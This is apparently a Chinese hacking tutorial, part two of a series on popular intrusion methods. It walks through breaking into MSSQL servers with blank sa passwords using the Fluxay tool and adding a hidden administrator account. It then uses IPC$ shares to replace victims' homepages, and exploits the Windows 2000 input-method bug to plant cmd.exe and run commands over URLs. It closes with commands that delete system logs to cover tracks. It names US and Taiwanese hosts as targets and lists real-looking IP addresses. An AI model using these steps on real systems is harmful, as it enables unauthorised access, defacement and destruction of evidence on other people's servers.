流行的漏洞入侵(二)

答案：4 SQL攻击网站 
这个也很方便,呵呵,上次在对美国大战中也有不少兄弟是用这种方法的,来看看吧 
我们需要小榕的流光作为武器,到WWW.NETEYES.COM去DOWN一个 
运行流光然后按快捷键ctrl＋r搜索！ 
选择aql！输入开始和结束的IP！扫描吧！到搜索结束！察看流光最下面的视图！格式如下： 
用户名 密码 地址 
sa 211.21.220.28 
sa 211.21.220.26 
sa 211.21.220.197 
其中《null》表示密码为空！ 
双击其中一项（或在工具……>SQL登录）！会弹出一个dos窗口！如果过一会该窗口消失！没戏了！对方不支持远程登录！在换一个！如果过一会出现如下的字样： 
SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas! 
Connect to 211.21.220.28 MSSQL Server Success, Type Command in Prompt. 
SQLCmd> 
那表示已经登录上了对方的主机！然后 
SQLCmd>net user ‘察看用户！如果不能察看，说明sa权限不够，那也没戏，换其他的方法！或是走人！有时用net user察看成功！再试试 
SQLCmd>net user administrator ’察看Admin的情况（可知是否在线）如果失败，撤退吧， 
没戏，换方法！ 没有权限,但是如果可以的话 
下一步： 
SQLCmd>net user hacker password /add '添加一给名为hacker，密码为passwod的用户！ 
SQLCmd>net localgroup administrators hacker /add ' 把刚才创建的用户加入 Admnistrators组 

好了，告一段落，下面启动DOS用刚创建的用户进行ipc$ 
net use \\*.*.*.*\ipc$ "password" /user:"hacker" '很熟悉吧！IPC$开始了！ 
执行成功的话！搞吧！删除！上传！下载！要什么！随你！ 
例如copy c:\hacker\index.htm \\IP\c$\inetpub\wwwroot\default.htm (IP为它的IP) 
干什么，换他的主页啊！呵呵！ 

据我的实践！针对台湾的主机！另一方法是用刚创建的用户名和密码用CuteFtp登录！就象管理自己的站点一样！任意删除创建Html页面！此方法对美国的主机没有成功过！我都是IPC$搞定的！ 

以上的原理是用SQL开门！用IPC$进门做作administrator可以作的事！但对于SQL主机！Administrator一般没有对数据库删除或创建的权限！此时可以down下他的sam文件解密(怎么DOWN?晕,看看我在上面UNICODE中写的教材)！默认用户名SQLAgentCmdExec，然后用天行的SQlBrowse登录就可以对数据库任意操作了！ 

5 利用输入法漏洞 
要说老美真不是东西,这么大个洞现在还尚存人间,也好,大家可以练练手 
1、用端口扫瞄程序扫IP的3389端口，得到xx.xx.xx.xx。 

　 2、运行windows2000终端客户程序，在服务器输入框里填入：xx.xx.xx.xx ，连接。 

　 3、出现windows2000的登陆窗口，按下CTRL+SHIFT键，出现全拼输入法。 

　 4、在输入法状态条上按mouse右键，选择帮助，选择输入指南，选择"选项"按右键。 

　 5、选择"跳转到URL"，输入：c:\winnt\system32\cmd.exe. 

　 6、选择"保存到磁盘"。 

　 7、选择目录：c:\inetpub\scripts\ 

　 8、打开IE，输入：xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ （知道了吧） 

　 9、输入：xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\default.asp 

还有一种方法 
1.扫描 3389 port 终端服务默认； 
2.用终端客户端程序进行连接； 
3.按ctrl+shift调出全拼输入法（其他似乎不行），点鼠标右键（如果其帮助菜单发灰，就赶快赶下家吧，人家打补丁了），点帮助，点输入法入门； 
4.在"选项"菜单上点右键--->跳转到URL"，输入：c:\winnt\system32\cmd.exe.（如果不能确定NT系统目录，则输入：c:\ 或d:\ ……进行查找确定）； 
5.选择"保存到磁盘" 选择目录：c:\inetpub\scripts\，因实际上是对方服务器上文件自身的复制操作，所以这个过程很快就会完成； 
6.打开IE，输入： http://ip/scripts/cmd.exe?/c dir 怎么样？有cmd.exe文件了吧？这我们就完成了第一步； 
7. http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat 
8. http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat 
9. http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat 
10. http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下： 

net user guest /active:yes 
net user guest elise 
net localgroup administrators /add guest 
11.在"选项"菜单上点右键--->跳转到URL"，输入：c:\inetpub\scripts\go.bat --->在磁盘当前位置执行； 
12.呵呵，大功告成啦，这样我们就激活了服务器的geust帐户，密码为：elise，超级用户呢！ （我喜欢guest而不是建立新帐户，这样似乎不易被发现些）， 
最后一定别不记的X掉自已的脚印 
del+C:\winnt\system32\logfiles\*.* 
del+C:\winnt\ssytem32\config\*.evt 
del+C:\winnt\system32\dtclog\*.* 
del+C:\winnt\system32\*.log 
del+C:\winnt\system32\*.txt 
del+C:\winnt\*.txt 
del+C:\winnt\*.log 

上一个：端口--服务对照(二)
下一个：流行的漏洞入侵(一)